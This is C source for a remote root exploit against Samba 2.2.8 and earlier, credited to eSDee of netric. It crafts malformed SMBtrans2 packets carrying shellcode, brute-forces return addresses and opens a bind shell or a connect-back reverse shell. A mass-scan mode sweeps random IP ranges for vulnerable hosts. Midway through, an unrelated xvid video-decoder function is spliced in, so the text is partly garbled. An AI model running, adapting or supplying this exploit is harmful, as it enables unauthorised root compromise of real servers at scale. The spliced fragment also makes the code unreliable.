int exploit_normal(int sock, unsigned long ret, char *shellcode)
{
char buffer[4000];
char exploit_data[] =
"\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x90";
int i = 0;
unsigned long dummy = ret - 0x90;
NETBIOS_HEADER *netbiosheader;
SMB_HEADER *smbheader;
memset(buffer, 0x00, sizeof(buffer));
netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
netbiosheader->type = 0x00; /* session message */
netbiosheader->flags = 0x04;
netbiosheader->length = htons(2096);
smbheader->protocol[0] = 0xFF;
smbheader->protocol[1] = 'S';
smbheader->protocol[2] = 'M';
smbheader->protocol[3] = 'B';
smbheader->command = 0x32; /* SMBtrans2 */
smbheader->tid = 0x01;
smbheader->uid = 100;
memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);
buffer[1096] = 0xEB;
buffer[1097] = 0x70;
for (i = 0; i < 4 * 24; i += 8) {
memcpy(buffer + 1099 + i, &dummy, 4);
memcpy(buffer + 1103 + i, &ret, 4);
}
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
exploit_data, sizeof(exploit_data) - 1);
memcpy(buffer + 1800, shellcode, strlen(shellcode));
if(write_timer(sock, 3) == 1) {
if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
return 0;
}
return -1;
}
xint
m4v_free_decoder(DEC_CTRL * xparam)
{
DECODER *dec = (DECODER *) xparam->handle;
xvid_free(dec->mbs);
xvid_free(dec->slice);
image_destroy(&dec->refn, dec->edged_width, dec->edged_height);
image_destroy(&dec->cur, dec->edged_width, dec->edged_height);
xvid_free(dec);
write_timer();
cleanup_timer();
return XVID_ERR_OK;
}
int main (int argc,char *argv[])
{
char *shellcode = NULL;
char scan_ip[256];
int brute = -1;
int connectback = 0;
int force = 0;
int i = 0;
int ip1 = 0;
int ip2 = 0;
int ip3 = 0;
int ip4 = 0;
int opt = 0;
int port = 139;
int random = 0;
int scan = 0;
int sock = 0;
int sock2 = 0;
int status = 0;
int type = 0;
int verbose = 0;
unsigned long BRUTE_DELAY = 100000;
unsigned long ret = 0x0;
unsigned long MAX_CHILDS = 40;
unsigned long STEPS = 300;
struct hostent *he;
fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\n"
"--------------------------------------------------------------\n");
while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) {
switch(opt)
{
case 'b':
brute = atoi(optarg);
if ((brute < 0) || (brute > 3)) {
fprintf(stderr, "Invalid platform.\n\n");
return -1;
}
break;
case 'B':
STEPS = atoi(optarg);
if (STEPS == 0) STEPS++;
break;
case 'c':
sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
connectback = 1;
if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) {
fprintf(stderr, "Invalid IP address.\n\n");
return -1;
}
linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1;
linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2;
linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3;
linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4;
break;
case 'C':
MAX_CHILDS = atoi(optarg);
if (MAX_CHILDS == 0) {
fprintf(stderr, "Invalid number of childs.\n");
return -1;
}
if (MAX_CHILDS > 99) {
fprintf(stderr, "Too many childs, using 99. \n");
MAX_CHILDS = 99;
}
break;
case 'd':
BRUTE_DELAY = atoi(optarg);
break;
case 'f':
force = 1;
break;
case 'p':
port = atoi(optarg);
if ((port <= 0) || (port > 65535)) {
fprintf(stderr, "Invalid port.\n\n");
return -1;
}
break;
case 'r':
ret = strtoul(optarg, &optarg, 16);
break;
case 's':
random = 1;
scan = 1;
break;
case 'S':
random = 0;
scan = 1;
sscanf(optarg, "%d.%d.%d", &ip1, &ip2, &ip3);
ip3--;
break;
case 't':
type = atoi(optarg);
if (type == 0 || type > sizeof(targets) / 16) {
for(i = 0; i < sizeof(targets) / 16; i++)
fprintf(stdout, "%02d. %s [0x%08x]\n", i + 1, targets[i].type, (unsigned int) targets[i].ret);
fprintf(stderr, "\n");
return -1;
}
break;
case 'v':
verbose = 1;
break;
default:
usage(argv[0] == NULL ? "sambal" : argv[0]);
break;
}
}
if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0))
usage(argv[0] == NULL ? "sambal" : argv[0]);
if (scan == 1)
fprintf(stdout, "+ Scan mode.\n");
if (verbose == 1)
fprintf(stdout, "+ Verbose mode.\n");
if (scan == 1) {
srand(getpid());
while (1) {
if (random == 1) {
ip1 = rand() % 255;
ip2 = rand() % 255;
ip3 = rand() % 255; }
else {
ip3++;
if (ip3 > 254) { ip3 = 1; ip2++; }
if (ip2 > 254) { ip2 = 1; ip1++; }
if (ip1 > 254) exit(0);
}
for (ip4 = 0; ip4 < 255; ip4++) {
i++;
snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4);
usleep(BRUTE_DELAY);
switch (fork()) {
case 0:
switch(is_samba(scan_ip, 2)) {
case 0:
fprintf(stdout, "+ [%s] Samba\n", scan_ip);
break;
case 1:
fprintf(stdout, "+ [%s] Windows\n", scan_ip);
break;
default:
break;
}
exit(0);
break;
case -1:
fprintf(stderr, "+ fork() error\n");
exit(-1);
break;
default:
if (i > MAX_CHILDS - 2) {
wait(&status);
i--;
}
break;
}
}
}
return 0;
}
he = gethostbyname(argv[optind]);
if (he == NULL) {
fprintf(stderr, "Unable to resolve %s...\n", argv[optind]);
return -1;
}
if (brute == -1) {
if (ret == 0) ret = targets[type - 1].ret;
shellcode = targets[type - 1].shellcode;
if (connectback == 1) {
fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:45295]\n",
ip1, ip2, ip3, ip4);
switch(targets[type - 1].os_type) {
case 0: /* linux */
shellcode = linux_connect_back;
break;
case 1: /* FreeBSD/NetBSD */
shellcode = bsd_connect_back;
break;
case 2: /* OpenBSD */
shellcode = bsd_connect_back;
break;
case 3: /* OpenBSD 3.2 Non-exec stack */
shellcode = bsd_connect_back;
break;
}
}
if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
fprintf(stderr, "+ socket() error.\n");
return -1;
}
if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
fprintf(stderr, "+ socket() error.\n");
return -1;
}
memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
memcpy(&addr2.sin_addr, he->h_addr, he->h_length);
addr1.sin_family = AF_INET;
addr1.sin_port = htons(port);
addr2.sin_family = AF_INET;
addr2.sin_port = htons(45295);
if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) {
fprintf(stderr, "+ connect() error.\n");
return -1;
}
if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].type);
if (force == 0) {
if (is_samba(argv[optind], 2) != 0) {
fprintf(stderr, "+ Host is not running samba!\n\n");
return -1;
}
fprintf(stderr, "+ Host is running samba.\n");
}
if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port);
if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.\n");
if (verbose == 1) fprintf(stdout, "+ Session enstablished\n");
sleep(5);
if (targets[type - 1].os_type != 2) {
if (exploit_normal(sock, ret, shellcode) < 0) {
fprintf(stderr, "+ Failed.\n");
close(sock);
}
} else {
if (exploit_openbsd32(sock, ret, shellcode) < 0) {
fprintf(stderr, "+ Failed.\n");
close(sock);
}
}
sleep(2);
if (connectback == 0) {
if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) {
fprintf(stderr, "+ Exploit failed, try -b to bruteforce.\n");
return -1;
}
fprintf(stdout, "--------------------------------------------------------------\n");
shell(sock2);
close(sock);
close(sock2);
} else {
fprintf(stdout, "+ Done...\n");
close(sock2);
close(sock);
}
return 0;
}
signal(SIGPIPE, SIG_IGN);
signal(SIGUSR1, handler);
switch(brute) {
case 0:
if (ret == 0) ret = 0xc0000000;
shellcode = linux_bindcode;
fprintf(stdout, "+ Bruteforce mode. (Linux)\n");
break;
case 1:
if (ret == 0) ret = 0xbfc00000;
shellcode = bsd_bindcode;
fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\n");
break;
case 2:
if (ret == 0) ret = 0xdfc00000;
shellcode = bsd_bindcode;
fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and prior)\n");
break;
case 3:
if (ret == 0) ret = 0x00170000;
shellcode = bsd_bindcode;
fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\n");
break;
}
memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
memcpy(&addr2.sin_addr, he->h_addr, he->h_length);
addr1.sin_family = AF_INET;
addr1.sin_port = htons(port);
addr2.sin_family = AF_INET;
addr2.sin_port = htons(45295);
for (i = 0; i < 100; i++)
childs[i] = -1;
i = 0;
if (force == 0) {
if (is_samba(argv[optind], 2) != 0) {
fprintf(stderr, "+ Host is not running samba!\n\n");
return -1;
}
fprintf(stderr, "+ Host is running samba.\n");
}
while (OWNED == 0) {
if (sock > 2) close(sock);
if (sock2 > 2) close(sock2);
if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
if (verbose == 1) fprintf(stderr, "+ socket() error.\n");
}
else {
ret -= STEPS;
i++;
}
if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0)
if (verbose == 1) fprintf(stderr, "+ socket() error.\n");
if ((ret & 0xff) == 0x00 && brute != 3) ret++;
if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (unsigned int)ret);
usleep(BRUTE_DELAY);
switch (childs[i] = fork()) {
case 0:
if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) {
if (sock > 2) close(sock);
if (sock2 > 2) close(sock2);
exit(-1);
}
if(write_timer(sock, 3) == 1) {
if (start_session(sock) < 0) {
if (verbose == 1) fprintf(stderr, "+ Session failed.\n");
if (sock > 2)close(sock);
if (sock2 > 2) close(sock2);
exit(-1);
}
if (brute == 3) {
if (exploit_openbsd32(sock, ret, shellcode) < 0) {
if (verbose == 1) fprintf(stderr, "+ Failed.\n");
if (sock > 2) close(sock);
if (sock2 > 2) close(sock2);
exit(-1);
}
}
else {
if (exploit_normal(sock, ret, shellcode) < 0) {
if (verbose == 1) fprintf(stderr, "+ Failed.\n");
if (sock > 2) close(sock);
if (sock2 > 2) close(sock2);
exit(-1);
}
if (sock > 2) close(sock);
if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
if (sock2 > 2) close(sock2);
exit(-1);
}
if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
if (sock2 > 2) close(sock2);
kill(getppid(), SIGUSR1);
}
exit(1);
}
exit(0);
break;
case -1:
fprintf(stderr, "+ fork() error\n");
exit(-1);
break;
default:
if (i > MAX_CHILDS - 2) {
wait(&status);
i--;
}
break;
}
}
}
return 0;
}
int start_session(int sock)
{
char buffer[1000];
char response[4096];
char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"
"\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";
NETBIOS_HEADER *netbiosheader;
SMB_HEADER *smbheader;
memset(buffer, 0x00, sizeof(buffer));
netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
netbiosheader->type = 0x00; /* session message */
netbiosheader->flags = 0x00;
netbiosheader->length = htons(0x2E);
smbheader->protocol[0] = 0xFF;
smbheader->protocol[1] = 'S';
smbheader->protocol[2] = 'M';
smbheader->protocol[3] = 'B';
smbheader->command = 0x73; /* session setup */
smbheader->flags = 0x08; /* caseless pathnames */
smbheader->flags2 = 0x01; /* long filenames supported */
smbheader->pid = getpid() & 0xFFFF;
smbheader->uid = 100;
smbheader->mid = 0x01;
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);
if(write_timer(sock, 3) == 1)
if (send(sock, buffer, 50, 0) < 0) return -1;
memset(response, 0x00, sizeof(response));
if (read_timer(sock, 3) == 1)
if (read(sock, response, sizeof(response) - 1) < 0) return -1;
netbiosheader = (NETBIOS_HEADER *)response;
smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));
if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n");
netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
memset(buffer, 0x00, sizeof(buffer));
netbiosheader->type = 0x00; /* session message */
netbiosheader->flags = 0x00;
netbiosheader->length = htons(0x3C);
smbheader->protocol[0] = 0xFF;
smbheader->protocol[1] = 'S';
smbheader->protocol[2] = 'M';
smbheader->protocol[3] = 'B';
smbheader->command = 0x70; /* start connection */
smbheader->pid = getpid() & 0xFFFF;
smbheader->tid = 0x00;
smbheader->uid = 100;
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);
if(write_timer(sock, 3) == 1)
if (send(sock, buffer, 64, 0) < 0) return -1;
memset(response, 0x00, sizeof(response));
if (read_timer(sock, 3) == 1)
if (read(sock, response, sizeof(response) - 1) < 0) return -1;
netbiosheader = (NETBIOS_HEADER *)response;
smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));
if (netbiosheader->type != 0x00) return -1;
return 0;
}
int is_samba(char *ip, unsigned long time_out)
{
char
nbtname[]= /* netbios name packet */
{
0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,
0x00,0x01
};
unsigned char recv_buf[1024];
unsigned char *ptr;
int i = 0;
int s = 0;
unsigned int total = 0;
if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1;
if(Connect(s, ip, 137, time_out) == -1) {
close(s);
return -1;
}
memset(recv_buf, 0x00, sizeof(recv_buf));
if(write_timer(s, time_out) == 1) {
if (write(s, nbtname, sizeof(nbtname)) <= 0) {
close(s);
return -1;
}
}
if (read_timer(s, time_out) == 1) {
if (read(s, recv_buf, sizeof(recv_buf)) <= 0) {
close(s);
return -1;
}
ptr = recv_buf + 57;
total = *(ptr - 1); /* max names */
while(ptr < recv_buf + sizeof(recv_buf)) {
ptr += 18;
if (i == total) {
ptr -= 19;
if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 &&
*(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) {
close(s);
return 0;
}
close(s);
return 1;
}
i++;
}
}
close(s);
return -1;
}
